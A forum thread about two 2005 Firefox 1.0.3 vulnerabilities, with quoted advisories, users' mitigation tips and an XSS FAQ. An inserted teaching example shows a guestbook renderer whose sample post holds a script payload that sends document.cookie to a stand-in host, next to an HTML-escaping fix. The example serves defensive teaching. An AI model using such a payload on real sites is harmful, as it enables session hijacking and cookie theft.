Firefox Critical Flaws Discovered

Ice Czar

http://secunia.com/advisories/15292/

Two vulnerabilities have been discovered in Firefox, which can be exploited by malicious people to conduct cross-site scripting attacks and compromise a user's system.

1) The problem is that "IFRAME" JavaScript URLs are not properly protected from being executed in context of another URL in the history list. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an arbitrary site.

2) Input passed to the "IconURL" parameter in "InstallTrigger.install()" is not properly verified before being used. This can be exploited to execute arbitrary JavaScript code with escalated privileges via a specially crafted JavaScript URL.

Successful exploitation requires that the site is allowed to install software (default sites are "update.mozilla.org" and "addons.mozilla.org").

A combination of vulnerability 1 and 2 can be exploited to execute arbitrary code.

NOTE: Exploit code is publicly available.

The vulnerabilities have been confirmed in version 1.0.3. Other versions may also be affected.

Solution:

Disable JavaScript.

To that end:
noscript.exe (direct download)
indirect: http://www.sarc.com/avcenter/venc/data/win.script.hosting.html

and/or

AnalogX Script Defender
 
Ice Czar said:
Successful exploitation requires that the site is allowed to install software (default sites are "update.mozilla.org" and "addons.mozilla.org").
Alternate solution: don't install software from non-trusted sites. Just pointing out that for most people using FF (certainly most people on this forum) the JS disable is overkill.
 
You'd think so,
but then again, can you recall how many sites you've allowed JavaScript on in the past?
(Isn't it rule-based?)
I run with WSH disabled and the AnalogX intercepts by default anyway
(Department of Redundancy Department :p),
only turning it on when I can't get access to a feature without it ;)
 
Thanks, Ice Czar! I applied the patches and I feel warm and safe. Well, I will stay vigilant ;)

The title scared the shit outta me, so I patched up as quickly as I saw it :eek:
 
Well, they aren't really patches,
more an added security precaution / layer ;)
 
Can you just go to "tools/options/web features" and un-check the "enable javascript" box? (ver 1.0.3 btw)
 
Well, not a problem for Linux; programs do not have auto-exec permission.
 
Monkey34 said:
Can you just go to "tools/options/web features" and un-check the "enable javascript" box? (ver 1.0.3 btw)

I'm not sure.
 
Ice Czar said:
You'd think so,
but then again, can you recall how many sites you've allowed JavaScript on in the past?
Allowing JS at sites and allowing program install at sites are two different things, though. I haven't needed to expand my install-allow list ever.
 
I had to do that yesterday for a client's box to get McAfee to update.

Seems there is an update:
http://secunia.com/advisories/15292/
Solution:
1) Disable JavaScript.

2) Disable software installation: Options --> Web Features --> "Allow web sites to install software"

NOTE: A temporary solution has been added to the sites "update.mozilla.org" and "addons.mozilla.org" where requests are redirected to "do-not-add.mozilla.org". This will stop the publicly available exploit code using a combination of vulnerability 1 and 2 to execute arbitrary code in the default settings of Firefox.


https://do-not-add.mozilla.org/
To address security concerns, we have made a number of changes, including temporarily changing the URL for this site. If prompted, please DO NOT add this new URL (do-not-add.mozilla.org) to your Allowed Sites or White List.

Which I gather is to address the cross-site scripting attacks.

http://www.cgisecurity.com/articles/xss-faq.shtml

"What is Cross Site Scripting?"

Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, instant message, or simply just reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with html and javascript embedded in them. If for example I was logged in as "john" and read a message by "joe" that contained malicious javascript in it, then it may be possible for "joe" to hijack my session just by reading his bulletin board post. Further details on how attacks like this are accomplished via "cookie theft" are explained in detail below.

"What are the threats of Cross Site Scripting?"

Often attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user (Read below for further details) in order to gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. New malicious uses are being found every day for XSS attacks.
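The guestbook case the FAQ describes, as an added example that is not part of the original thread or the cgisecurity FAQ: a toy board renderer that embeds posts verbatim (the vulnerable pattern), beside a version that HTML-escapes every user-supplied field first. The posts, the cookie-stealing payload and the evil.example host are constructed for the demo.

```javascript
// Added example, not from the thread or the cgisecurity FAQ. Demonstrates the
// stored XSS the FAQ describes: a board that embeds user posts into its page
// unescaped, next to the escaped rendering that stops it.

// Constructed sample posts. "joe" submits a post carrying script; any reader
// whose browser renders the unsafe page runs it in the board's origin, and
// document.cookie is sent to joe's server (hypothetical host evil.example).
const posts = [
  { author: "john", body: "Nice board!" },
  {
    author: "joe",
    body: '<script>new Image().src="http://evil.example/c?"+document.cookie</script>',
  },
];

// Vulnerable: concatenates the body as-is, like the guestbook programs the FAQ mentions.
function renderUnsafe(post) {
  return `<li><b>${post.author}</b>: ${post.body}</li>`;
}

// Minimal HTML entity escaping for text placed in element content or in
// double-quoted attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: every untrusted field passes through escapeHtml before concatenation,
// so joe's tag reaches the reader as inert text rather than markup.
function renderSafe(post) {
  return `<li><b>${escapeHtml(post.author)}</b>: ${escapeHtml(post.body)}</li>`;
}

function renderBoard(render) {
  return "<ul>\n" + posts.map(render).join("\n") + "\n</ul>";
}

// Crude check used only to show the difference: is a live <script> tag
// still present in the rendered HTML?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log("unsafe rendering:\n" + renderBoard(renderUnsafe));
console.log("\nsafe rendering:\n" + renderBoard(renderSafe));
console.log("\nunsafe has live script:", containsScriptTag(renderBoard(renderUnsafe)));
console.log("safe has live script:", containsScriptTag(renderBoard(renderSafe)));
```

Escaping on output is the fix for the injection itself; marking the session cookie HttpOnly only limits what a successful injection can read, and is no substitute.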
 
http://www.techworld.com/news/index.cfm?RSS&NewsID=3619

An attacker could create a malicious page using frames and a JavaScript history flaw to make software installations appear to be coming from a "trusted" site. By default, Firefox allows software installations from update.mozilla.org and addons.mozilla.org, but users can add their own sites to this whitelist.

The second part of the exploit triggers software installation using an input verification bug in the "IconURL" parameter in the install mechanism. The effect is that a user could click on an icon and trigger the execution of malicious JavaScript code. Because the code is executed from the browser's user interface, it has the same privileges as the user running Firefox, according to researchers.

Mozilla Foundation said it has protected most users from the exploit by altering the software installation mechanism on its two whitelisted sites.
However, users may be vulnerable if they have added other sites to the whitelist, it warned.

"We believe this means that users who have not added any additional sites to their software installation whitelist are no longer at risk," Mozilla Foundation said in a statement published on Mozillazine.org.

............................
 
The Mozilla Foundation has made changes to our update servers that will protect users from this arbitrary code execution exploit. Users who have added other extension or theme sites to the software installation whitelist should remove them until a fixed version of Firefox is available.
Select the "Options" dialog from the "Tools" menu
Select the "Web Features" icon
Click the "Allowed Sites" button on the same line as the "Allow web sites to install software" checkbox
Click the "Remove All Sites" button
Click "OK"
To prevent the script injection exploit from stealing cookies or other sensitive data disable Javascript before visiting untrustworthy sites. In Firefox:

Select the "Options" dialog from the "Tools" menu
Select the "Web Features" icon
Uncheck the "Enable Javascript" checkbox
Click "OK"
Straight from "Mozilla Foundation Security Advisory 2005-42"
Just un-check the boxes... it's as simple as that (until a real fix is implemented).
 